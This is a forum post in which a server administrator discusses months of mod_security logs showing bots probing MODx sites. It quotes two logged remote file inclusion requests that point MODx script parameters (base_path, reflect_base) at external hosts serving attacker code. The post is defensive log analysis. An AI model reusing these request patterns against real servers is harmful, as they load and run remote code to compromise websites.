Do people think that they’re just employing a brute force dragnet
I don’t know. But looking at my modsec logs for the past few months over 90% is either the reflect request or this one:
//manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://belajarhack2008.webs.com/ide.txt??? HTTP/1.0
Is this a new one or an old one? I seem to remember this from before.
My modsec logs used to only have phpBB and Joomla bots (never installed either on my server) but now they are overcome with modx related notices. On my server I have a cross section of HTML pages, some custom PHP stuff, and a handful of MODx sites. Only the domains with modx sites are being targeted by bots, the other domains are not (could be coincidence). Only the site in my sig is linked to the forum but that one does not get as many attempts as others that are not and is only a few months old.
I can trace back to the very first time a bot hit my server looking for reflect:
Date: 2008-11-23 at 22:00:52
From IP: 211.115.213.66
Request: /modx//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://billing.magnoliasouth.com//include/scripts/idscan9? HTTP/1.1
Since then there have been 9,334 blocked bot attempts recorded on my modsec logs. That is almost 50% of bots blocked in the entire year of 2008, since the bots started my logs have doubled in size (more activity in last 2 months than the other 10).
I think that modx became the current target for the script kiddies, must be a tutorial someplace with instructions on how to build a bot to look for reflect.